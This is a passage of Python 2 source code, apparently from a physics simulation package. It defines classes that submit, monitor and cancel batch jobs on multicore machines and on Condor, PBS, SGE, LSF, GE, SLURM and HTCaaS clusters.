def remove(self, *args, **opts):
""" """
logger.warning("""This cluster didn't support job removal,
the jobs are still running on the cluster.""")
@store_input()
def metasubmit(self, me_dir):
logger.warning("""This cluster didn't support metajob submit.""")
return 0
class Packet(object):
""" an object for handling packet of job, it is designed to be thread safe
"""
def __init__(self, name, fct, args, opts={}):
import Queue
import threading
self.queue = Queue.Queue()
self.tag = name
self.fct = fct
self.args = args
self.opts = opts
self.done = threading.Event()
def put(self, *args, **opts):
self.queue.put(*args, **opts)
append = put
def remove_one(self):
self.queue.get(True)
self.queue.task_done()
return self.queue.qsize()
class MultiCore(Cluster):
"""class for dealing with the submission in multiple node"""
job_id = "$"
def __init__(self, *args, **opt):
"""Init the cluster """
super(MultiCore, self).__init__(self, *args, **opt)
import Queue
import threading
import thread
self.queue = Queue.Queue() # list of job to do
self.done = Queue.Queue() # list of job finisned
self.submitted = Queue.Queue() # one entry by job submitted
self.stoprequest = threading.Event() #flag to ensure everything to close
self.demons = []
self.nb_done =0
if 'nb_core' in opt:
self.nb_core = opt['nb_core']
elif isinstance(args[0],int):
self.nb_core = args[0]
else:
self.nb_core = 1
self.update_fct = None
self.lock = threading.Event() # allow nice lock of the main thread
self.pids = Queue.Queue() # allow to clean jobs submit via subprocess
self.done_pid = [] # list of job finisned
self.done_pid_queue = Queue.Queue()
self.fail_msg = None
# starting the worker node
for _ in range(self.nb_core):
self.start_demon()
def start_demon(self):
import threading
t = threading.Thread(target=self.worker)
t.daemon = True
t.start()
self.demons.append(t)
def worker(self):
import Queue
import thread
while not self.stoprequest.isSet():
try:
args = self.queue.get()
tag, exe, arg, opt = args
try:
# check for executable case
if isinstance(exe,str):
if os.path.exists(exe) and not exe.startswith('/'):
exe = './' + exe
if isinstance(opt['stdout'],str):
opt['stdout'] = open(opt['stdout'],'w')
if opt['stderr'] == None:
opt['stderr'] = subprocess.STDOUT
proc = misc.Popen([exe] + arg, **opt)
pid = proc.pid
self.pids.put(pid)
proc.wait()
if proc.returncode not in [0, 143, -15] and not self.stoprequest.isSet():
fail_msg = 'program %s launch ends with non zero status: %s. Stop all computation' % \
(' '.join([exe]+arg), proc.returncode)
logger.warning(fail_msg)
self.stoprequest.set()
self.remove(fail_msg)
# handle the case when this is a python function. Note that
# this use Thread so they are NO built-in parralelization this is
# going to work on a single core! (but this is fine for IO intensive
# function. for CPU intensive fct this will slow down the computation
else:
pid = tag
self.pids.put(pid)
# the function should return 0 if everything is fine
# the error message otherwise
returncode = exe(*arg, **opt)
if returncode != 0:
logger.warning("fct %s does not return 0. Stopping the code in a clean way. The error was:\n%s", exe, returncode)
self.stoprequest.set()
self.remove("fct %s does not return 0:\n %s" % (exe, returncode))
except Exception,error:
self.fail_msg = sys.exc_info()
logger.warning(str(error))
self.stoprequest.set()
self.remove(error)
if __debug__:
raise self.fail_msg[0], self.fail_msg[1],self.fail_msg[2]
self.queue.task_done()
self.done.put(tag)
self.done_pid_queue.put(pid)
#release the mother to print the status on the screen
try:
self.lock.set()
except thread.error:
continue
except Queue.Empty:
continue
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, required_output=[], nb_submit=0):
"""submit a job on multicore machine"""
tag = (prog, tuple(argument), cwd, nb_submit)
if isinstance(prog, str):
opt = {'cwd': cwd,
'stdout':stdout,
'stderr': stderr}
self.queue.put((tag, prog, argument, opt))
self.submitted.put(1)
return tag
else:
# python function
self.queue.put((tag, prog, argument, {}))
self.submitted.put(1)
return tag
def launch_and_wait(self, prog, argument=[], cwd=None, stdout=None,
stderr=None, log=None, **opts):
"""launch one job and wait for it"""
if isinstance(stdout, str):
stdout = open(stdout, 'w')
if isinstance(stderr, str):
stdout = open(stderr, 'w')
return misc.call([prog] + argument, stdout=stdout, stderr=stderr, cwd=cwd)
def remove(self, error=None):
"""Ensure that all thread are killed"""
# ensure the worker to stop
self.stoprequest.set()
if error and not self.fail_msg:
self.fail_msg = error
# cleaning the queue done_pid_queue and move them to done_pid
while not self.done_pid_queue.empty():
pid = self.done_pid_queue.get()
self.done_pid.append(pid)
# self.done_pid_queue.task_done()
while not self.pids.empty():
pid = self.pids.get()
self.pids.task_done()
if isinstance(pid, tuple):
continue
if pid in self.done_pid:
continue
out = os.system('CPIDS=$(pgrep -P %(pid)s); kill -15 $CPIDS > /dev/null 2>&1' \
% {'pid':pid} )
out = os.system('kill -15 %(pid)s > /dev/null 2>&1' % {'pid':pid} )
def wait(self, me_dir, update_status, update_first=None):
"""Waiting that all the jobs are done. This function also control that
the submission by packet are handle correctly (i.e. submit the function)"""
import Queue
import threading
try: # to catch KeyBoardInterupt to see which kind of error to display
last_status = (0, 0, 0)
sleep_time = 1
use_lock = True
first = True
while True:
force_one_more_loop = False # some security
# Loop over the job tagged as done to check if some packet of jobs
# are finished in case, put the associate function in the queue
while self.done.qsize():
try:
tag = self.done.get(True, 1)
except Queue.Empty:
pass
else:
if self.id_to_packet and tuple(tag) in self.id_to_packet:
packet = self.id_to_packet[tuple(tag)]
remaining = packet.remove_one()
if remaining == 0:
# fully ensure that the packet is finished (thread safe)
packet.queue.join()
self.submit(packet.fct, packet.args)
force_one_more_loop = True
self.nb_done += 1
self.done.task_done()
# Get from the various queue the Idle/Done/Running information
# Those variable should be thread safe but approximate.
Idle = self.queue.qsize()
Done = self.nb_done + self.done.qsize()
Running = max(0, self.submitted.qsize() - Idle - Done)
if Idle + Running <= 0 and not force_one_more_loop:
update_status(Idle, Running, Done)
# Going the quit since everything is done
# Fully Ensure that everything is indeed done.
self.queue.join()
break
if (Idle, Running, Done) != last_status:
if first and update_first:
update_first(Idle, Running, Done)
first = False
else:
update_status(Idle, Running, Done)
last_status = (Idle, Running, Done)
# cleaning the queue done_pid_queue and move them to done_pid
while not self.done_pid_queue.empty():
pid = self.done_pid_queue.get()
self.done_pid.append(pid)
self.done_pid_queue.task_done()
# Define how to wait for the next iteration
if use_lock:
# simply wait that a worker release the lock
use_lock = self.lock.wait(300)
self.lock.clear()
if not use_lock and Idle > 0:
use_lock = True
else:
# to be sure that we will never fully lock at the end pass to
# a simple time.sleep()
time.sleep(sleep_time)
sleep_time = min(sleep_time + 2, 180)
if update_first:
update_first(Idle, Running, Done)
if self.stoprequest.isSet():
if isinstance(self.fail_msg, Exception):
raise self.fail_msg
elif isinstance(self.fail_msg, str):
raise Exception, self.fail_msg
else:
misc.sprint(self.fail_msg)
raise self.fail_msg[0], self.fail_msg[1], self.fail_msg[2]
# reset variable for next submission
try:
self.lock.clear()
except Exception:
pass
self.done = Queue.Queue()
self.done_pid = []
self.done_pid_queue = Queue.Queue()
self.nb_done = 0
self.submitted = Queue.Queue()
self.pids = Queue.Queue()
self.stoprequest.clear()
except KeyboardInterrupt:
# if one of the node fails -> return that error
if isinstance(self.fail_msg, Exception):
raise self.fail_msg
elif isinstance(self.fail_msg, str):
raise Exception, self.fail_msg
elif self.fail_msg:
raise self.fail_msg[0], self.fail_msg[1], self.fail_msg[2]
# else return orignal error
raise
class CondorCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'condor'
job_id = 'CONDOR_ID'
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a Condor cluster"""
text = """Executable = %(prog)s
output = %(stdout)s
error = %(stderr)s
log = %(log)s
%(argument)s
environment = CONDOR_ID=$(Cluster).$(Process)
Universe = vanilla
notification = Error
Initialdir = %(cwd)s
%(requirement)s
getenv=True
queue 1
"""
if self.cluster_queue not in ['None', None]:
requirement = 'Requirements = %s=?=True' % self.cluster_queue
else:
requirement = ''
if cwd is None:
cwd = os.getcwd()
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
if log is None:
log = '/dev/null'
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if argument:
argument = 'Arguments = %s' % ' '.join(argument)
else:
argument = ''
dico = {'prog': prog, 'cwd': cwd, 'stdout': stdout,
'stderr': stderr,'log': log,'argument': argument,
'requirement': requirement}
#open('submit_condor','w').write(text % dico)
a = misc.Popen(['condor_submit'], stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
output, _ = a.communicate(text % dico)
#output = a.stdout.read()
#Submitting job(s).
#Logging submit event(s).
#1 job(s) submitted to cluster 2253622.
pat = re.compile("submitted to cluster (\d*)",re.MULTILINE)
try:
id = pat.search(output).groups()[0]
except:
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
self.submitted += 1
self.submitted_ids.append(id)
return id
@store_input()
@multiple_try()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""Submit the job on the cluster NO SHARE DISK
input/output file should be give relative to cwd
"""
if not required_output and output_files:
required_output = output_files
if (input_files == [] == output_files):
return self.submit(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
text = """Executable = %(prog)s
output = %(stdout)s
error = %(stderr)s
log = %(log)s
%(argument)s
should_transfer_files = YES
when_to_transfer_output = ON_EXIT
transfer_input_files = %(input_files)s
%(output_files)s
Universe = vanilla
notification = Error
Initialdir = %(cwd)s
%(requirement)s
getenv=True
queue 1
"""
if self.cluster_queue not in ['None', None]:
requirement = 'Requirements = %s=?=True' % self.cluster_queue
else:
requirement = ''
if cwd is None:
cwd = os.getcwd()
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
if log is None:
log = '/dev/null'
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if argument:
argument = 'Arguments = %s' % ' '.join([str(a) for a in argument])
else:
argument = ''
# input/output file treatment
if input_files:
input_files = ','.join(input_files)
else:
input_files = ''
if output_files:
output_files = 'transfer_output_files = %s' % ','.join(output_files)
else:
output_files = ''
dico = {'prog': prog, 'cwd': cwd, 'stdout': stdout,
'stderr': stderr,'log': log,'argument': argument,
'requirement': requirement, 'input_files':input_files,
'output_files':output_files}
#open('submit_condor','w').write(text % dico)
a = subprocess.Popen(['condor_submit'], stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
output, _ = a.communicate(text % dico)
#output = a.stdout.read()
#Submitting job(s).
#Logging submit event(s).
#1 job(s) submitted to cluster 2253622.
pat = re.compile("submitted to cluster (\d*)",re.MULTILINE)
try:
id = pat.search(output).groups()[0]
except:
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try(nb_try=10, sleep=10)
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'condor_q '+str(id)+" -format \'%-2s \\n\' \'ifThenElse(JobStatus==0,\"U\",ifThenElse(JobStatus==1,\"I\",ifThenElse(JobStatus==2,\"R\",ifThenElse(JobStatus==3,\"X\",ifThenElse(JobStatus==4,\"C\",ifThenElse(JobStatus==5,\"H\",ifThenElse(JobStatus==6,\"E\",string(JobStatus))))))))\'"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read()
if status.returncode or error:
raise ClusterManagmentError, 'condor_q returns error: %s' % error
return status.stdout.readline().strip()
@check_interupt()
@multiple_try(nb_try=10, sleep=10)
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
return 0, 0, 0, 0
packet = 15000
idle, run, fail = 0, 0, 0
ongoing = []
for i in range(1+(len(self.submitted_ids)-1)//packet):
start = i * packet
stop = (i+1) * packet
cmd = "condor_q " + ' '.join(self.submitted_ids[start:stop]) + \
" -format \'%-2s\ ' \'ClusterId\' " + \
" -format \'%-2s \\n\' \'ifThenElse(JobStatus==0,\"U\",ifThenElse(JobStatus==1,\"I\",ifThenElse(JobStatus==2,\"R\",ifThenElse(JobStatus==3,\"X\",ifThenElse(JobStatus==4,\"C\",ifThenElse(JobStatus==5,\"H\",ifThenElse(JobStatus==6,\"E\",string(JobStatus))))))))\'"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read()
if status.returncode or error:
raise ClusterManagmentError, 'condor_q returns error: %s' % error
for line in status.stdout:
id, status = line.strip().split()
ongoing.append(int(id))
if status in ['I','U']:
idle += 1
elif status == 'R':
run += 1
elif status != 'C':
fail += 1
for id in list(self.submitted_ids):
if int(id) not in ongoing:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobson the cluster"""
if not self.submitted_ids:
return
cmd = "condor_rm %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class PBSCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'pbs'
job_id = 'PBS_JOBID'
idle_tag = ['Q']
running_tag = ['T','E','R']
complete_tag = ['C']
maximum_submited_jobs = 2500
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a PBS cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
if len(self.submitted_ids) > self.maximum_submited_jobs:
fct = lambda idle, run, finish: logger.info('Waiting for free slot: %s %s %s' % (idle, run, finish))
self.wait(me_dir, fct, self.maximum_submited_jobs)
text = ""
if cwd is None:
cwd = os.getcwd()
else:
text = " cd %s;" % cwd
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
if log is None:
log = '/dev/null'
if not os.path.isabs(prog):
text += "./%s" % prog
else:
text+= prog
if argument:
text += ' ' + ' '.join(argument)
command = ['qsub','-o', stdout,
'-N', me_dir,
'-e', stderr,
'-V']
if self.cluster_queue and self.cluster_queue != 'None':
command.extend(['-q', self.cluster_queue])
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate(text)[0]
id = output.split('.')[0]
if not id.isdigit() or a.returncode !=0:
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'qstat '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
for line in status.stdout:
line = line.strip()
if 'cannot connect to server' in line or 'cannot read reply' in line:
raise ClusterManagmentError, 'server disconnected'
if 'Unknown' in line:
return 'F'
elif line.startswith(str(id)):
jobstatus = line.split()[4]
else:
jobstatus=""
if status.returncode != 0 and status.returncode is not None:
raise ClusterManagmentError, 'server fails in someway (errorcode %s)' % status.returncode
if jobstatus in self.idle_tag:
return 'I'
elif jobstatus in self.running_tag:
return 'R'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
cmd = "qstat"
status = misc.Popen([cmd], stdout=subprocess.PIPE)
me_dir = self.get_jobs_identifier(me_dir)
ongoing = []
idle, run, fail = 0, 0, 0
for line in status.stdout:
if 'cannot connect to server' in line or 'cannot read reply' in line:
raise ClusterManagmentError, 'server disconnected'
if me_dir in line:
ongoing.append(line.split()[0].split('.')[0])
status2 = line.split()[4]
if status2 in self.idle_tag:
idle += 1
elif status2 in self.running_tag:
run += 1
elif status2 in self.complete_tag:
if not self.check_termination(line.split()[0].split('.')[0]):
idle += 1
else:
fail += 1
if status.returncode != 0 and status.returncode is not None:
raise ClusterManagmentError, 'server fails in someway (errorcode %s)' % status.returncode
for id in list(self.submitted_ids):
if id not in ongoing:
status2 = self.check_termination(id)
if status2 == 'wait':
run += 1
elif status2 == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "qdel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class SGECluster(Cluster):
"""Basic class for dealing with cluster submission"""
# Class written by Arian Abrahantes.
name = 'sge'
job_id = 'JOB_ID'
idle_tag = ['qw', 'hqw','hRqw','w']
running_tag = ['r','t','Rr','Rt']
identifier_length = 10
def def_get_path(self,location):
"""replace string for path issues"""
location = os.path.realpath(location)
homePath = os.getenv("HOME")
if homePath:
location = location.replace(homePath,'$HOME')
return location
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to an SGE cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
if cwd is None:
#cwd = os.getcwd()
cwd = self.def_get_path(os.getcwd())
cwd1 = self.def_get_path(cwd)
text = " cd %s;" % cwd1
if stdout is None:
stdout = '/dev/null'
else:
stdout = self.def_get_path(stdout)
if stderr is None:
stderr = '/dev/null'
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
else:
stderr = self.def_get_path(stderr)
if log is None:
log = '/dev/null'
else:
log = self.def_get_path(log)
text += prog
if argument:
text += ' ' + ' '.join(argument)
#if anything slips through argument
#print "!=== inteded change ",text.replace('/srv/nfs','')
#text = text.replace('/srv/nfs','')
homePath = os.getenv("HOME")
if homePath:
text = text.replace(homePath,'$HOME')
logger.debug("!=== input %s" % text)
logger.debug("!=== output %s" % stdout)
logger.debug("!=== error %s" % stderr)
logger.debug("!=== logs %s" % log)
command = ['qsub','-o', stdout,
'-N', me_dir,
'-e', stderr,
'-V']
if self.cluster_queue and self.cluster_queue != 'None':
command.extend(['-q', self.cluster_queue])
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate(text)[0]
id = output.split(' ')[2]
if not id.isdigit():
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
self.submitted += 1
self.submitted_ids.append(id)
logger.debug(output)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
#cmd = 'qstat '+str(id)
cmd = 'qstat '
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
#print "!==",line
#line = line.strip()
#if 'Unknown' in line:
# return 'F'
#elif line.startswith(str(id)):
# status = line.split()[4]
if str(id) in line:
status = line.split()[4]
#print "!=status", status
if status in self.idle_tag:
return 'I'
elif status in self.running_tag:
return 'R'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
cmd = "qstat "
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
me_dir = self.get_jobs_identifier(me_dir)
finished = list(self.submitted_ids)
idle, run, fail = 0, 0, 0
for line in status.stdout:
if me_dir in line:
id,_,_,_,status = line.split()[:5]
if status in self.idle_tag:
idle += 1
finished.remove(id)
elif status in self.running_tag:
run += 1
finished.remove(id)
else:
logger.debug(line)
fail += 1
finished.remove(id)
for id in finished:
self.check_termination(id)
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "qdel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class LSFCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'lsf'
job_id = 'LSB_JOBID'
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit the job prog to an LSF cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
text = ""
command = ['bsub', '-C0', '-J', me_dir]
if cwd is None:
cwd = os.getcwd()
else:
text = " cd %s;" % cwd
if stdout and isinstance(stdout, str):
command.extend(['-o', stdout])
if stderr and isinstance(stdout, str):
command.extend(['-e', stderr])
elif stderr == -2: # -2 is subprocess.STDOUT
pass
if log is None:
log = '/dev/null'
text += prog
if argument:
text += ' ' + ' '.join(argument)
if self.cluster_queue and self.cluster_queue != 'None':
command.extend(['-q', self.cluster_queue])
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate(text)[0]
#Job <nnnn> is submitted to default queue <normal>.
try:
id = output.split('>',1)[0].split('<')[1]
except:
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
if not id.isdigit():
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'bjobs '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
line = line.strip().upper()
if 'JOBID' in line:
continue
elif str(id) not in line:
continue
status = line.split()[2]
if status == 'RUN':
return 'R'
elif status == 'PEND':
return 'I'
elif status == 'DONE':
return 'F'
else:
return 'H'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
return 0, 0, 0, 0
cmd = "bjobs " + ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
jobstatus = {}
for line in status.stdout:
line = line.strip()
if 'JOBID' in line:
continue
splitline = line.split()
id = splitline[0]
if id not in self.submitted_ids:
continue
jobstatus[id] = splitline[2]
idle, run, fail = 0, 0, 0
for id in self.submitted_ids[:]:
if id in jobstatus:
status = jobstatus[id]
else:
status = 'MISSING'
if status == 'RUN':
run += 1
elif status == 'PEND':
idle += 1
else:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args,**opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "bkill %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class GECluster(Cluster):
"""Class for dealing with cluster submission on a GE cluster"""
name = 'ge'
job_id = 'JOB_ID'
idle_tag = ['qw']
running_tag = ['r']
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a GE cluster"""
text = ""
if cwd is None:
cwd = os.getcwd()
else:
text = " cd %s; bash " % cwd
if stdout is None:
stdout = os.path.join(cwd, "log.%s" % prog.split('/')[-1])
if stderr is None:
stderr = os.path.join(cwd, "err.%s" % prog.split('/')[-1])
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
if log is None:
log = '/dev/null'
text += prog
if argument:
text += ' ' + ' '.join(argument)
text += '\n'
tmp_submit = os.path.join(cwd, 'tmp_submit')
open(tmp_submit,'w').write(text)
a = misc.Popen(['qsub','-o', stdout,
'-e', stderr,
tmp_submit],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate()[0]
#Your job 874511 ("test.sh") has been submitted
pat = re.compile("Your job (\d*) \(",re.MULTILINE)
try:
id = pat.search(output).groups()[0]
except:
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'qstat | grep '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
if not status:
return 'F'
#874516 0.00000 test.sh alwall qw 03/04/2012 22:30:35 1
pat = re.compile("^(\d+)\s+[\d\.]+\s+[\w\d\.]+\s+[\w\d\.]+\s+(\w+)\s")
stat = ''
for line in status.stdout.read().split('\n'):
if not line:
continue
line = line.strip()
try:
groups = pat.search(line).groups()
except:
raise ClusterManagmentError, 'bad syntax for stat: \n\"%s\"' % line
if groups[0] != id: continue
stat = groups[1]
if not stat:
return 'F'
if stat in self.idle_tag:
return 'I'
if stat in self.running_tag:
return 'R'
@multiple_try()
def control(self, me_dir=None):
"""Check the status of job associated to directory me_dir. return (idle, run, finish, fail)"""
if not self.submitted_ids:
return 0, 0, 0, 0
idle, run, fail = 0, 0, 0
ongoing = []
for statusflag in ['p', 'r', 'sh']:
cmd = 'qstat -s %s' % statusflag
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
#874516 0.00000 test.sh alwall qw 03/04/2012 22:30:35 1
pat = re.compile("^(\d+)")
for line in status.stdout.read().split('\n'):
line = line.strip()
try:
id = pat.search(line).groups()[0]
except Exception:
pass
else:
if id not in self.submitted_ids:
continue
ongoing.append(id)
if statusflag == 'p':
idle += 1
if statusflag == 'r':
run += 1
if statusflag == 'sh':
fail += 1
for id in list(self.submitted_ids):
if id not in ongoing:
self.check_termination(id)
#self.submitted_ids = ongoing
return idle, run, self.submitted - idle - run - fail, fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "qdel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
def asyncrone_launch(exe, cwd=None, stdout=None, argument = [], **opt):
"""start a computation and not wait for it to finish.
this fonction returns a lock which is locked as long as the job is
running."""
mc = MultiCore(1)
mc.submit(exe, argument, cwd, stdout, **opt)
mc.need_waiting = True
return mc.lock
class SLURMCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'slurm'
job_id = 'SLURM_JOBID'
idle_tag = ['Q','PD','S','CF']
running_tag = ['R', 'CG']
complete_tag = ['C']
identifier_length = 8
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a SLURM cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
if cwd is None:
cwd = os.getcwd()
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
if log is None:
log = '/dev/null'
command = ['sbatch', '-o', stdout,
'-J', me_dir,
'-e', stderr, prog] + argument
if self.cluster_queue and self.cluster_queue != 'None':
command.insert(1, '-p')
command.insert(2, self.cluster_queue)
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate()
output_arr = output[0].split(' ')
id = output_arr[3].rstrip()
if not id.isdigit():
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% (output[0] + '\n' + output[1])
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'squeue j'+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=open(os.devnull,'w'))
for line in status.stdout:
line = line.strip()
if 'Invalid' in line:
return 'F'
elif line.startswith(str(id)):
status = line.split()[4]
if status in self.idle_tag:
return 'I'
elif status in self.running_tag:
return 'R'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
cmd = "squeue"
pstatus = misc.Popen([cmd], stdout=subprocess.PIPE)
me_dir = self.get_jobs_identifier(me_dir)
idle, run, fail = 0, 0, 0
ongoing=[]
for line in pstatus.stdout:
if me_dir in line:
id, _, _,_ , status,_ = line.split(None,5)
ongoing.append(id)
if status in self.idle_tag:
idle += 1
elif status in self.running_tag:
run += 1
elif status in self.complete_tag:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
else:
fail += 1
#control other finished job
for id in list(self.submitted_ids):
if id not in ongoing:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "scancel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class HTCaaSCluster(Cluster):
"""Class for dealing with cluster submission on a HTCaaS cluster using GPFS """
name= 'htcaas'
job_id = 'HTCAAS_JOBID'
idle_tag = ['waiting']
running_tag = ['preparing','running']
complete_tag = ['done']
@store_input()
@multiple_try()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""Submit the HTCaaS job on the cluster with NO SHARE DISK
input/output file should be given as relative to CWd
"""
# To make workspace name(temp)
cur_usr = os.getenv('USER')
if cwd is None:
cwd = os.getcwd()
cwd_cp = cwd.rsplit("/",2)
if not stdout is None:
print "stdout: %s" % stdout
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if not required_output and output_files:
required_output = output_files
logger.debug(prog)
if 'combine' not in prog and 'pythia' not in prog and 'shower' not in prog :
cwd_arg = cwd+"/arguments"
temp = ' '.join([str(a) for a in argument])
arg_cmd="echo '"+temp+"' > " + cwd_arg
command = ['htcaas-mgjob-submit','-d',cwd,'-e',os.path.basename(prog)]
if argument :
command.extend(['-a ', '='.join([str(a) for a in argument])])
a = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
else:
cwd_arg = cwd+"/arguments"
temp = ' '.join([str(a) for a in argument])
temp_file_name = "sub." + os.path.basename(prog)
text = """#!/bin/bash
MYPWD=%(cwd)s
cd $MYPWD
input_files=(%(input_files)s )
for i in ${input_files[@]}
do
chmod -f +x $i
done
/bin/bash %(prog)s %(arguments)s > %(stdout)s
"""
